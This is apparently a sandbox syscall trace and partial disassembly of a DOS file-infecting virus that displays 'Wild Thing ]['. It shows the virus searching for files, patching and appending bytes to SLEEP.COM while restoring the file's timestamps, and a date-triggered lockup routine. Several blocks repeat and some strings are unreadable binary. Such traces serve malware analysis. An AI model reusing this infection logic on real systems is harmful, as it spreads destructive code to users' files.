2018-12-25T12:42:13.503522484Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.505123461Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.506590783Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.508850545Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.510558885Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.512184437Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.518142004Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.520328594Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.521706731Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.523722158Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.526063181Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.527247509Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.528745054Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.532206303Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.533542752Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.537623683Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.539486964Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.540803804Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.542318847Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.548018559Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.549740455Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.551306805Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.553490101Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.557293075Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.560308423Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.561922898Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.564639888Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.57044128Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.57386535Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.576043349Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.578246913Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.584379526Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.586357095Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.591976044Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.594823233Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.596731363Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.598622142Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.601639149Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.607626006Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.609908789Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.613135284Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.615100625Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.616623504Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.619071762Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.621301732Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.623350226Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.625695842Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.636627113Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.643110843Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.646101942Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.648804712Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.672632986Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.67474803Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.677085905Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.679616888Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.681969615Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.68408233Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.68568415Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.688434112Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.689956161Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.692643523Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.69919212Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.706571618Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.710973558Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.716062026Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.717632542Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.719314677Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.72285097Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.724160284Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.725794609Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.728244901Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.730125332Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.732555831Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.734939729Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.742459433Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.74495351Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.746822802Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.749171032Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.751425402Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.75352248Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.75672945Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.758136796Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.760015738Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.755129558Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.756835294Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.758460363Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.760576116Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.762516316Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.770091838Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.777322752Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.783656497Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.805746879Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.818743941Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.820450691Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.827082424Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.828928523Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.832236096Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.837688213Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.843647842Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.844972481Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.851651595Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.859028844Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.861155427Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.865488478Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.872604151Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.880091666Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.881459405Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.886750553Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.888165963Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.890232761Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.892514349Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.899738401Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.901832831Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.911346336Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.922145314Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.925060231Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.931913341Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.942788824Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.959657574Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.962346831Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.970453615Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.97226381Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.975680517Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.978406084Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.992713924Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.994887701Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.008003062Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.019839944Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.023286362Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.031695431Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.043556893Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.055833328Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.058720522Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.066705764Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.068705456Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.072327145Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.075508993Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.089561928Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.09248598Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.101999889Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.112993026Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.115977367Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.123469913Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.134712049Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.142579339Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.145293926Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.153351177Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.158683857Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.162863567Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.165326569Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.174721983Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.177054307Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.186781811Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.198134668Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.201527137Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.209349906Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.220973364Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.228792111Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.231654205Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.23955496Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.246271389Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.251787424Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.253369257Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.259601617Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.261386124Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.266897445Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.273284897Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.276033891Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.282538093Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.29368164Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.30109676Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.303109676Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.310160224Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.311630733Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.315437758Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.317330443Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.326275075Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.328944427Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.337590194Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.345751606Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.34836152Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.353031442Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.360083228Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.364653848Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.366357408Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.37323275Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.375738206Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.383675839Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.394579137Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.397706476Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.403117556Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.40512119Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.406761608Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.610637486Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.612525307Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.615310324Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.619443878Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.631662407Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.633615256Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.636928639Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.655662043Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.657393524Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.662756664Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.666780462Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.669998788Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.674209809Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.682145764Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.691353089Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.698128536Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.710240233Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.712468614Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.715551423Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.741320179Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.746192223Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.748169918Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.751798281Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.753582418Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.755403379Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.758320774Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.767189166Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.769634301Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.77287208Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.774883472Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.776816076Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.779887259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.7822913Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.784466447Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.787713722Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.789528106Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.791354785Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.793442597Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.794767446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.796090432Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.797918801Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.799205765Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.800519889Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.802391388Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.803708582Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.805078577Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.806990443Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.808360774Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.809648077Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.811446937Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.813340172Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.814742312Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.817196826Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.820084203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.822098114Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.824281064Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.826517473Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.828565015Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:13.8337975Z 62 PC: 8f90e | Close file
2018-12-25T12:42:13.836515872Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:13.838391803Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:13.840372668Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:13.845577705Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:13.847430689Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:13.852481882Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:13.854431671Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:13.855822Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:13.857291437Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:13.85882886Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:13.859842706Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:13.861133405Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:13.862474261Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:13.866982963Z 73 PC: 8efea | Release memory
2018-12-25T12:42:13.868283219Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:13.870346536Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:13.871873383Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:13.873254122Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:13.874761693Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:13.882641762Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:13.887711588Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:13.889607594Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:13.891689868Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:13.912569866Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:13.914037286Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:13.915360661Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.917757095Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:13.919077127Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:13.92028162Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:13.92162982Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:13.923540586Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:13.924707517Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:13.928865045Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:13.935924236Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:13.940351893Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:13.942879212Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:13.94437159Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:13.945562138Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:13.946567377Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:13.948787528Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:13.950011619Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:13.95110743Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.952869558Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.95430652Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:13.956568074Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:13.960778546Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:13.966767431Z 62 PC: 131ba | Close file
2018-12-25T12:42:13.96914351Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:13.971181166Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:13.97352303Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:13.975454541Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:13.977828429Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:13.979539672Z 73 PC: 119df | Release memory
2018-12-25T12:42:13.980793374Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:13.982872621Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.888986263Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.891595353Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.89450498Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.898024597Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.900894786Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.908358486Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.92089019Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.934084741Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.95309831Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.960971155Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.963008675Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.972354156Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.980267279Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.983668254Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.986660962Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.99859563Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:11.000446616Z 62 PC: 12bfc | Close file
2018-12-25T12:42:11.010018048Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:11.022340883Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.025708087Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.033031703Z 67 PC: 12b89 | Get or set file attributes (See above)
